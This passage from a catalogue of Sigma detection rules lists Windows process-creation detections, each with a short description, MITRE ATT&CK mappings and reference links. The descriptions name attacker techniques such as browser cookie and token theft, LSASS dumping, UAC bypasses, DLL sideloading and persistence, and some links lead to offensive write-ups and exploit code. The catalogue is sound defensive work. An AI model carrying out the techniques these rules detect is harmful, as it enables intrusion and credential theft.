Invoke-Obfuscation CLIP+ Launcher

Detects Obfuscated use of Clip.exe to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation CLIP+ Launcher"

Invoke-Obfuscation CLIP+ Launcher has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10211. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml

Potential Password Spraying Attempt Using Dsacls.EXE

Detects possible password spraying attempts using Dsacls

The tag is: misp-galaxy:sigma-rules="Potential Password Spraying Attempt Using Dsacls.EXE"

Potential Password Spraying Attempt Using Dsacls.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10212. Table References

Links

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)

https://ss64.com/nt/dsacls.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml

SQLite Chromium Profile Data DB Access

Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.

The tag is: misp-galaxy:sigma-rules="SQLite Chromium Profile Data DB Access"

SQLite Chromium Profile Data DB Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 10213. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows

https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml

PsExec Service Execution

Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution

The tag is: misp-galaxy:sigma-rules="PsExec Service Execution"

Table 10214. Table References

Links

https://www.youtube.com/watch?v=ro2QuZTIMBM

https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc.yml

Potential DLL Injection Or Execution Using Tracker.exe

Detects potential DLL injection and execution using "Tracker.exe"

The tag is: misp-galaxy:sigma-rules="Potential DLL Injection Or Execution Using Tracker.exe"

Potential DLL Injection Or Execution Using Tracker.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

Table 10215. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml

Potentially Suspicious PowerShell Child Processes

Detects potentially suspicious child processes spawned by PowerShell

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious PowerShell Child Processes"

Potentially Suspicious PowerShell Child Processes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10216. Table References

Links

https://twitter.com/ankit_anubhav/status/1518835408502620162

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_child_processes.yml

HackTool - CrackMapExec Process Patterns

Detects suspicious process patterns found in logs when CrackMapExec is used

The tag is: misp-galaxy:sigma-rules="HackTool - CrackMapExec Process Patterns"

HackTool - CrackMapExec Process Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10217. Table References

Links

https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml

Portable Gpg.EXE Execution

Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.

The tag is: misp-galaxy:sigma-rules="Portable Gpg.EXE Execution"

Portable Gpg.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

Table 10218. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md

https://securelist.com/locked-out/68960/

https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_portable_execution.yml

Suspicious Child Process Of Manage Engine ServiceDesk

Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service

The tag is: misp-galaxy:sigma-rules="Suspicious Child Process Of Manage Engine ServiceDesk"

Suspicious Child Process Of Manage Engine ServiceDesk has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 10219. Table References

Links

https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/

https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py

https://blog.viettelcybersecurity.com/saml-show-stopper/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml

New Port Forwarding Rule Added Via Netsh.EXE

Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule

The tag is: misp-galaxy:sigma-rules="New Port Forwarding Rule Added Via Netsh.EXE"

New Port Forwarding Rule Added Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 10220. Table References

Links

https://adepts.of0x.cc/netsh-portproxy-code/

https://www.dfirnotes.net/portproxy_detection/

https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_forwarding.yml

Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script

Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script"

Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10221. Table References

Links

https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/

https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml

Potential Execution of Sysinternals Tools

Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools

The tag is: misp-galaxy:sigma-rules="Potential Execution of Sysinternals Tools"

Potential Execution of Sysinternals Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 10222. Table References

Links

https://twitter.com/Moti_B/status/1008587936735035392

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml

Suspicious Schtasks Execution AppData Folder

Detects the creation of a schtask that executes a file from C:\Users\<USER>\AppData\Local

The tag is: misp-galaxy:sigma-rules="Suspicious Schtasks Execution AppData Folder"

Suspicious Schtasks Execution AppData Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10223. Table References

Links

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml

Suspicious Runscripthelper.exe

Detects execution of powershell scripts via Runscripthelper.exe

The tag is: misp-galaxy:sigma-rules="Suspicious Runscripthelper.exe"

Suspicious Runscripthelper.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10224. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml

UAC Bypass Using Disk Cleanup

Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using Disk Cleanup"

UAC Bypass Using Disk Cleanup has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10225. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml

Suspicious Parent Double Extension File Execution

Detect execution of suspicious double extension files in ParentCommandLine

The tag is: misp-galaxy:sigma-rules="Suspicious Parent Double Extension File Execution"

Suspicious Parent Double Extension File Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Double File Extension - T1036.007" with estimative-language:likelihood-probability="almost-certain"

Table 10226. Table References

Links

https://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension_parent.yml

ZOHO Dctask64 Process Injection

Detects suspicious process injection using ZOHO’s dctask64.exe

The tag is: misp-galaxy:sigma-rules="ZOHO Dctask64 Process Injection"

ZOHO Dctask64 Process Injection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

Table 10227. Table References

Links

https://twitter.com/gN3mes1s/status/1222095371175911424

https://twitter.com/gN3mes1s/status/1222095963789111296

https://twitter.com/gN3mes1s/status/1222088214581825540

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml

Imports Registry Key From an ADS

Detects the import of a alternate datastream to the registry with regedit.exe.

The tag is: misp-galaxy:sigma-rules="Imports Registry Key From an ADS"

Imports Registry Key From an ADS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10229. Table References

Links

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://lolbas-project.github.io/lolbas/Binaries/Regedit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml

Suspicious Binary In User Directory Spawned From Office Application

Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)

The tag is: misp-galaxy:sigma-rules="Suspicious Binary In User Directory Spawned From Office Application"

Suspicious Binary In User Directory Spawned From Office Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 10230. Table References

Links

https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign

https://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml

Detect Virtualbox Driver Installation OR Starting Of VMs

Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.

The tag is: misp-galaxy:sigma-rules="Detect Virtualbox Driver Installation OR Starting Of VMs"

Detect Virtualbox Driver Installation OR Starting Of VMs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Run Virtual Instance - T1564.006" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

Table 10231. Table References

Links

https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/

https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_virtualbox_execution.yml

Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution

Detects execution of Windows Defender "OfflineScannerShell.exe" from its non standard directory. The "OfflineScannerShell.exe" binary is vulnerable to DLL side loading and will load any DLL named "mpclient.dll" from the current working directory.

The tag is: misp-galaxy:sigma-rules="Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution"

Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10232. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml

Potential Data Stealing Via Chromium Headless Debugging

Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control

The tag is: misp-galaxy:sigma-rules="Potential Data Stealing Via Chromium Headless Debugging"

Potential Data Stealing Via Chromium Headless Debugging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"

Table 10233. Table References

Links

https://github.com/defaultnamehere/cookie_crimes/

https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/

https://mango.pdf.zone/stealing-chrome-cookies-without-a-password

https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml

Suspicious Office Token Search Via CLI

Detects possible search for office tokens via CLI by looking for the string "eyJ0eX". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.

The tag is: misp-galaxy:sigma-rules="Suspicious Office Token Search Via CLI"

Suspicious Office Token Search Via CLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 10234. Table References

Links

https://mrd0x.com/stealing-tokens-from-office-applications/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml

Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE

Detects potential malicious and unauthorized usage of bcdedit.exe

The tag is: misp-galaxy:sigma-rules="Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE"

Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"

Table 10235. Table References

Links

https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit—​set

https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bcdedit_susp_execution.yml

DirLister Execution

Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.

The tag is: misp-galaxy:sigma-rules="DirLister Execution"

DirLister Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 10236. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md

https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dirlister_execution.yml

Devtoolslauncher.exe Executes Specified Binary

The Devtoolslauncher.exe executes other binary

The tag is: misp-galaxy:sigma-rules="Devtoolslauncher.exe Executes Specified Binary"

Devtoolslauncher.exe Executes Specified Binary has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10237. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/

https://twitter.com/_felamos/status/1179811992841797632

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml

File Encoded To Base64 Via Certutil.EXE

Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration

The tag is: misp-galaxy:sigma-rules="File Encoded To Base64 Via Certutil.EXE"

File Encoded To Base64 Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10238. Table References

Links

https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil

https://lolbas-project.github.io/lolbas/Binaries/Certutil/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode.yml

Potential Privilege Escalation via Service Permissions Weakness

Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level

The tag is: misp-galaxy:sigma-rules="Potential Privilege Escalation via Service Permissions Weakness"

Potential Privilege Escalation via Service Permissions Weakness has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 10239. Table References

Links

https://pentestlab.blog/2017/03/31/insecure-registry-permissions/

https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml

Potential Renamed Rundll32 Execution

Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection

The tag is: misp-galaxy:sigma-rules="Potential Renamed Rundll32 Execution"

Table 10240. Table References

Links

https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/

https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml

New ActiveScriptEventConsumer Created Via Wmic.EXE

Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence

The tag is: misp-galaxy:sigma-rules="New ActiveScriptEventConsumer Created Via Wmic.EXE"

New ActiveScriptEventConsumer Created Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 10241. Table References

Links

https://twitter.com/johnlatwc/status/1408062131321270282?s=12

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml

Potential Privilege Escalation To LOCAL SYSTEM

Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges

The tag is: misp-galaxy:sigma-rules="Potential Privilege Escalation To LOCAL SYSTEM"

Potential Privilege Escalation To LOCAL SYSTEM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

Table 10242. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://www.poweradmin.com/paexec/

https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml

Possible Privilege Escalation via Weak Service Permissions

Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand

The tag is: misp-galaxy:sigma-rules="Possible Privilege Escalation via Weak Service Permissions"

Possible Privilege Escalation via Weak Service Permissions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 10243. Table References

Links

https://pentestlab.blog/2017/03/30/weak-service-permissions/

https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml

ShimCache Flush

Detects actions that clear the local ShimCache and remove forensic evidence

The tag is: misp-galaxy:sigma-rules="ShimCache Flush"

ShimCache Flush has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10244. Table References

Links

https://medium.com/@blueteamops/shimcache-flush-89daff28d15e

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml

Console CodePage Lookup Via CHCP

Detects use of chcp to look up the system locale value as part of host discovery

The tag is: misp-galaxy:sigma-rules="Console CodePage Lookup Via CHCP"

Console CodePage Lookup Via CHCP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"

Table 10245. Table References

Links

https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml

HackTool - SharPersist Execution

Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms

The tag is: misp-galaxy:sigma-rules="HackTool - SharPersist Execution"

HackTool - SharPersist Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 10246. Table References

Links

https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit

https://github.com/mandiant/SharPersist

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpersist.yml

Suspicious File Characteristics Due to Missing Fields

Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe

The tag is: misp-galaxy:sigma-rules="Suspicious File Characteristics Due to Missing Fields"

Suspicious File Characteristics Due to Missing Fields has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"

Table 10247. Table References

Links

https://www.virustotal.com//file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection

https://securelist.com/muddywater/88059/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml

Cscript/Wscript Uncommon Script Extension Execution

Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension

The tag is: misp-galaxy:sigma-rules="Cscript/Wscript Uncommon Script Extension Execution"

Cscript/Wscript Uncommon Script Extension Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 10248. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml

PUA - 3Proxy Execution

Detects the use of 3proxy, a tiny free proxy server

The tag is: misp-galaxy:sigma-rules="PUA - 3Proxy Execution"

PUA - 3Proxy Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

Table 10249. Table References

Links

https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://github.com/3proxy/3proxy

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_3proxy_execution.yml

Bypass UAC via WSReset.exe

Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.

The tag is: misp-galaxy:sigma-rules="Bypass UAC via WSReset.exe"

Bypass UAC via WSReset.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10250. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html

https://www.activecyber.us/activelabs/windows-uac-bypass

https://twitter.com/ReaQta/status/1222548288731217921

https://lolbas-project.github.io/lolbas/Binaries/Wsreset/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml

Python Inline Command Execution

Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code.

The tag is: misp-galaxy:sigma-rules="Python Inline Command Execution"

Python Inline Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10251. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.revshells.com/

https://docs.python.org/3/using/cmdline.html#cmdoption-c

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml

Schtasks Creation Or Modification With SYSTEM Privileges

Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges

The tag is: misp-galaxy:sigma-rules="Schtasks Creation Or Modification With SYSTEM Privileges"

Schtasks Creation Or Modification With SYSTEM Privileges has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10252. Table References

Links

https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml

Suspicious Greedy Compression Using Rar.EXE

Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes

The tag is: misp-galaxy:sigma-rules="Suspicious Greedy Compression Using Rar.EXE"

Suspicious Greedy Compression Using Rar.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10253. Table References

Links

https://decoded.avast.io/martinchlumecky/png-steganography

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_susp_greedy_compression.yml

HackTool - CrackMapExec Execution Patterns

Detects various execution patterns of the CrackMapExec pentesting framework

The tag is: misp-galaxy:sigma-rules="HackTool - CrackMapExec Execution Patterns"

HackTool - CrackMapExec Execution Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10254. Table References

Links

https://github.com/byt3bl33d3r/CrackMapExec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml

Whoami.EXE Execution From Privileged Process

Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors

The tag is: misp-galaxy:sigma-rules="Whoami.EXE Execution From Privileged Process"

Whoami.EXE Execution From Privileged Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10255. Table References

Links

https://nsudo.m2team.org/en-us/

https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml

Nltest.EXE Execution

Detects nltest commands that can be used for information discovery

